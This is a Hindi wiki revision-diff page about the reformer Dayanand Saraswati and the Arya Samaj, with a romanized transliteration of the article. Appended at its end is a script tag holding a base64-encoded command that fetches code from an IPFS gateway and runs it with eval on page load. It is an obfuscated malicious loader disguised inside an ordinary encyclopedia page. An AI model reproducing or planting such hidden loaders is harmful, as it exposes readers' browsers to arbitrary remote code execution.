Difference between revisions of "दयानंद सरस्वती"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - " मे " to " में ")
Line 15: Line 15:
 
बहुत से स्थानों में भ्रमण करते हुए इन्होंने कतिपय आचार्यों से शिक्षा प्राप्त की। प्रथमत: वेदान्त के प्रभाव में आये तथा आत्मा एवं ब्रह्म की एकता को स्वीकार किया।  ये अद्वैत मत में दीक्षित हुए एवं इनका नाम 'शुद्ध चैतन्य"  पड़ा। पश्चात ये संन्यासियों की चतुर्थ श्रेणी में दीक्षित हुए एवं यहाँ इनकी प्रचलित उपाधि दयानन्द सरस्वती हुई।  फिर इन्होंने योग को अपनाते हुए वेदान्त के सभी सिद्धान्तों को छोड़ दिया।  दयानन्द सरस्वती के मध्य जीवन काल में जिस महापुरुष ने सबसे बड़ा धार्मिक प्रभाव डाला, वे थे मथुरा के प्रज्ञाचक्षु स्वामी विरजानन्द, जो वैदिक साहित्य के माने हुए विद्वान थे।  उन्होंने इन्हें वेद पढ़ाया । वेद की शिक्षा दे चुकने के बाद उन्होंने इन शब्दों के साथ दयानन्द  को छुट्टी दी "मैं चाहता हूँ कि तुम संसार में जाओं और मनुष्यों में ज्ञान की ज्योति फैलाओ।" संक्षेप में इनके जीवन को हम पौराणिक हिन्दुत्व से आरम्भ कर दार्शनिक हिन्दुत्व के पथ पर चलते हुए हिन्दुत्व की आधार शिला [[वैदिक धर्म]] तक पहुँचता हुआ पाते हैं।  इन्होंने [[शैवमत]] एवं वेदान्त का परित्याग किया, सांख्ययोग को अपनाया जो उनका दार्शनिक लक्ष्य था और इसी दार्शनिक माध्यम से वेद की भी व्याख्या की।  जीवन के अन्तिम बीस वर्ष इन्होंने जनता को अपना संदेश सुनाने में लगाये।  दक्षिण में बम्बई से पूरा, उत्तर में कलकत्ता से लाहौर तक इन्होंने अपनी शिक्षाएँ घूम-घूम कर दीं।  पण्डितों, मौलवियों एवं पादरियों से इन्होंने शास्त्रार्थ किया, जिसमें काशी का शास्त्रार्थ महत्त्वपूर्ण था।  इस बीच इन्होंने साहित्यकार्य भी किये।  चार वर्ष की उपदेश यात्रा के पश्चात ये गंगातट पर स्वास्थ्य सुधारने के लिए फिर बैठ गये।  ढाई वर्ष के बाद पुन: जनसेवा का कार्य आरम्भ किया।  
 
बहुत से स्थानों में भ्रमण करते हुए इन्होंने कतिपय आचार्यों से शिक्षा प्राप्त की। प्रथमत: वेदान्त के प्रभाव में आये तथा आत्मा एवं ब्रह्म की एकता को स्वीकार किया।  ये अद्वैत मत में दीक्षित हुए एवं इनका नाम 'शुद्ध चैतन्य"  पड़ा। पश्चात ये संन्यासियों की चतुर्थ श्रेणी में दीक्षित हुए एवं यहाँ इनकी प्रचलित उपाधि दयानन्द सरस्वती हुई।  फिर इन्होंने योग को अपनाते हुए वेदान्त के सभी सिद्धान्तों को छोड़ दिया।  दयानन्द सरस्वती के मध्य जीवन काल में जिस महापुरुष ने सबसे बड़ा धार्मिक प्रभाव डाला, वे थे मथुरा के प्रज्ञाचक्षु स्वामी विरजानन्द, जो वैदिक साहित्य के माने हुए विद्वान थे।  उन्होंने इन्हें वेद पढ़ाया । वेद की शिक्षा दे चुकने के बाद उन्होंने इन शब्दों के साथ दयानन्द  को छुट्टी दी "मैं चाहता हूँ कि तुम संसार में जाओं और मनुष्यों में ज्ञान की ज्योति फैलाओ।" संक्षेप में इनके जीवन को हम पौराणिक हिन्दुत्व से आरम्भ कर दार्शनिक हिन्दुत्व के पथ पर चलते हुए हिन्दुत्व की आधार शिला [[वैदिक धर्म]] तक पहुँचता हुआ पाते हैं।  इन्होंने [[शैवमत]] एवं वेदान्त का परित्याग किया, सांख्ययोग को अपनाया जो उनका दार्शनिक लक्ष्य था और इसी दार्शनिक माध्यम से वेद की भी व्याख्या की।  जीवन के अन्तिम बीस वर्ष इन्होंने जनता को अपना संदेश सुनाने में लगाये।  दक्षिण में बम्बई से पूरा, उत्तर में कलकत्ता से लाहौर तक इन्होंने अपनी शिक्षाएँ घूम-घूम कर दीं।  पण्डितों, मौलवियों एवं पादरियों से इन्होंने शास्त्रार्थ किया, जिसमें काशी का शास्त्रार्थ महत्त्वपूर्ण था।  इस बीच इन्होंने साहित्यकार्य भी किये।  चार वर्ष की उपदेश यात्रा के पश्चात ये गंगातट पर स्वास्थ्य सुधारने के लिए फिर बैठ गये।  ढाई वर्ष के बाद पुन: जनसेवा का कार्य आरम्भ किया।  
 
----
 
----
1863 से 1875 ई. तक स्वामी जी देश का भ्रमण करके अपने विचारों का प्रचार करते रहें।  उन्होंने वेदों के प्रचार का वीणा उठाया और इस काम को पूरा करने के लिए 7 अप्रैल 1875 ई. को 'आर्य समाज' नामक संस्था की स्थापना की।  शीघ्र ही इसकी शाखाएं देश-भर में फैल गई।  देश के सांस्कृतिक और राष्ट्रीय नवजागरण में आर्य समाज की बहुत बड़ी देन रही है। हिन्दू समाज को इससे नई चेतना मिली और अनेक संस्कारगत कुरीतियों से छुटकारा मिला।  स्वामी जी [[एकेश्वरवाद]] मे विश्वास करते थे।  उन्होंने जातिवाद और बाल-विवाह का विरोध किया और नारी शिक्षा तथा विधवा विवाह को प्रोत्साहित किया।  उनका कहना था कि किसी भी अहिन्दू को हिन्दू धर्म में लिया जा सकता है। इससे हिंदुओं का धर्म परिवर्तन रूक गया।
+
1863 से 1875 ई. तक स्वामी जी देश का भ्रमण करके अपने विचारों का प्रचार करते रहें।  उन्होंने वेदों के प्रचार का वीणा उठाया और इस काम को पूरा करने के लिए 7 अप्रैल 1875 ई. को 'आर्य समाज' नामक संस्था की स्थापना की।  शीघ्र ही इसकी शाखाएं देश-भर में फैल गई।  देश के सांस्कृतिक और राष्ट्रीय नवजागरण में आर्य समाज की बहुत बड़ी देन रही है। हिन्दू समाज को इससे नई चेतना मिली और अनेक संस्कारगत कुरीतियों से छुटकारा मिला।  स्वामी जी [[एकेश्वरवाद]] में विश्वास करते थे।  उन्होंने जातिवाद और बाल-विवाह का विरोध किया और नारी शिक्षा तथा विधवा विवाह को प्रोत्साहित किया।  उनका कहना था कि किसी भी अहिन्दू को हिन्दू धर्म में लिया जा सकता है। इससे हिंदुओं का धर्म परिवर्तन रूक गया।
 
----
 
----
 
स्वामी दयानंद सरस्वती ने अपने विचारों के प्रचार के लिए हिन्दी भाषा को अपनाया।  उनकी सभी रचनाएं और सर्वाधिक महत्त्वपूर्ण ग्रंथ 'सत्यार्थ प्रकाश' मूल रूप में हिन्दी भाषा में लिखा गया।  उनका कहना था-"मेरी आंख तो उस दिन को देखने के लिए तरस रही है। जब [[कश्मीर]] से कन्याकुमारी तक सब भारतीय एक भाषा बोलने और समझने लग जाएंगे।" स्वामी जी धार्मिक संकीर्णता और पाखंड के विरोधी थे।  अत: कुछ लोग उनसे शत्रुता भी करने लगे।  इन्हीं में से किसी ने 1883 ई. में दूध में कांच पीसकर पिला दिया जिससे आपका देहांत हो गया। आज भी उनके अनुयायी देश में शिक्षा आदि का महत्त्वपूर्ण कार्य कर रहे हैं।
 
स्वामी दयानंद सरस्वती ने अपने विचारों के प्रचार के लिए हिन्दी भाषा को अपनाया।  उनकी सभी रचनाएं और सर्वाधिक महत्त्वपूर्ण ग्रंथ 'सत्यार्थ प्रकाश' मूल रूप में हिन्दी भाषा में लिखा गया।  उनका कहना था-"मेरी आंख तो उस दिन को देखने के लिए तरस रही है। जब [[कश्मीर]] से कन्याकुमारी तक सब भारतीय एक भाषा बोलने और समझने लग जाएंगे।" स्वामी जी धार्मिक संकीर्णता और पाखंड के विरोधी थे।  अत: कुछ लोग उनसे शत्रुता भी करने लगे।  इन्हीं में से किसी ने 1883 ई. में दूध में कांच पीसकर पिला दिया जिससे आपका देहांत हो गया। आज भी उनके अनुयायी देश में शिक्षा आदि का महत्त्वपूर्ण कार्य कर रहे हैं।

Revision as of 07:56, 20 February 2011

dayanand sarasvati
Dayanand Saraswati|thumb|250px

maharshi svami dayanand sarasvati (janm- 1824 ee., gujarat, bharat; mrityu- 1883 ee.) ary samaj ke pravartak aur prakhar sudharavadi sanyasi the. jis samay keshavachandr sen brahmasamaj ke prachar mean sanlagn the lagabhag usi samay dandi svami virajanand ki mathura puri sthit kuti se prachand agnishikha ke saman tapobal se prajvalit, vedavidyanidhan ek sanyasi nikala, jisane pahale-pahal sanskritajn vidvatsansar ko vedarth aur shastrarth ke lie lalakara. yah sanyasi svami dayanand sarasvati the.


prachin rrishiyoan ke vaidik siddhaantoan ki pakshapati prasiddh sanstha, jisake pratishthata svami dayanand sarasvati ka janm gujarat ke bhootapoorv moravi rajy ke ek gaanv mean san 1824 ee. mean hua tha. inaka praranbhik nam moolashankar tatha pita ka nam ambashankar tha. svami dayanand balyakal mean shankar ke bhakt the. yah b de medhavi aur honahar the. brahmacharyakal mean hi ye bharatoddhar ka vrat lekar ghar se nikal p de. inake jivan ko mote taur se tin bhagoan mean baant sakate haian:

  • ghar ka jivan(1824-1845),
  • bhraman tatha adhyayan (1845-1863) evan
  • prachar tatha sarvajanik seva. (1863-1883)

svami dayanand ji ke prarambhik ghareloo jivan ki tin ghatanaean dharmik mahattv ki haian :

  1. chaudah varsh ki avastha mean moortipooja ke prati vidroh (jab shivachaturdashi ki rat mean inhoanne ek choohe ko shiv ki moorti par chadhate tatha use ganda karate dekha),
  2. apani bahin ki mrityu se atyant du:khi hokar sansar tyag karane tatha mukti prapt karane ka nishchay aur
  3. ikkis varsh ki ayu mean vivah ka avasar upasthit jan, ghar se bhagana. ghar tyagane ke pashchat 18 varsh tak inhoanne sanyasi ka jivan bitaya. inhoanne bahut se sthanoan mean bhraman karate hue katipay acharyoan se shiksha prapt ki.

bahut se sthanoan mean bhraman karate hue inhoanne katipay acharyoan se shiksha prapt ki. prathamat: vedant ke prabhav mean aye tatha atma evan brahm ki ekata ko svikar kiya. ye advait mat mean dikshit hue evan inaka nam 'shuddh chaitany" p da. pashchat ye sannyasiyoan ki chaturth shreni mean dikshit hue evan yahaan inaki prachalit upadhi dayanand sarasvati huee. phir inhoanne yog ko apanate hue vedant ke sabhi siddhantoan ko chho d diya. dayanand sarasvati ke madhy jivan kal mean jis mahapurush ne sabase b da dharmik prabhav dala, ve the mathura ke prajnachakshu svami virajanand, jo vaidik sahity ke mane hue vidvan the. unhoanne inhean ved padhaya . ved ki shiksha de chukane ke bad unhoanne in shabdoan ke sath dayanand ko chhutti di "maian chahata hooan ki tum sansar mean jaoan aur manushyoan mean jnan ki jyoti phailao." sankshep mean inake jivan ko ham pauranik hindutv se arambh kar darshanik hindutv ke path par chalate hue hindutv ki adhar shila vaidik dharm tak pahuanchata hua pate haian. inhoanne shaivamat evan vedant ka parityag kiya, saankhyayog ko apanaya jo unaka darshanik lakshy tha aur isi darshanik madhyam se ved ki bhi vyakhya ki. jivan ke antim bis varsh inhoanne janata ko apana sandesh sunane mean lagaye. dakshin mean bambee se poora, uttar mean kalakatta se lahaur tak inhoanne apani shikshaean ghoom-ghoom kar dian. panditoan, maulaviyoan evan padariyoan se inhoanne shastrarth kiya, jisamean kashi ka shastrarth mahattvapoorn tha. is bich inhoanne sahityakary bhi kiye. char varsh ki upadesh yatra ke pashchat ye gangatat par svasthy sudharane ke lie phir baith gaye. dhaee varsh ke bad pun: janaseva ka kary arambh kiya.


1863 se 1875 ee. tak svami ji desh ka bhraman karake apane vicharoan ka prachar karate rahean. unhoanne vedoan ke prachar ka vina uthaya aur is kam ko poora karane ke lie 7 aprail 1875 ee. ko 'ary samaj' namak sanstha ki sthapana ki. shighr hi isaki shakhaean desh-bhar mean phail gee. desh ke saanskritik aur rashtriy navajagaran mean ary samaj ki bahut b di den rahi hai. hindoo samaj ko isase nee chetana mili aur anek sanskaragat kuritiyoan se chhutakara mila. svami ji ekeshvaravad mean vishvas karate the. unhoanne jativad aur bal-vivah ka virodh kiya aur nari shiksha tatha vidhava vivah ko protsahit kiya. unaka kahana tha ki kisi bhi ahindoo ko hindoo dharm mean liya ja sakata hai. isase hianduoan ka dharm parivartan rook gaya.


svami dayanand sarasvati ne apane vicharoan ke prachar ke lie hindi bhasha ko apanaya. unaki sabhi rachanaean aur sarvadhik mahattvapoorn granth 'satyarth prakash' mool roop mean hindi bhasha mean likha gaya. unaka kahana tha-"meri aankh to us din ko dekhane ke lie taras rahi hai. jab kashmir se kanyakumari tak sab bharatiy ek bhasha bolane aur samajhane lag jaeange." svami ji dharmik sankirnata aur pakhand ke virodhi the. at: kuchh log unase shatruta bhi karane lage. inhian mean se kisi ne 1883 ee. mean doodh mean kaanch pisakar pila diya jisase apaka dehaant ho gaya. aj bhi unake anuyayi desh mean shiksha adi ka mahattvapoorn kary kar rahe haian.

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>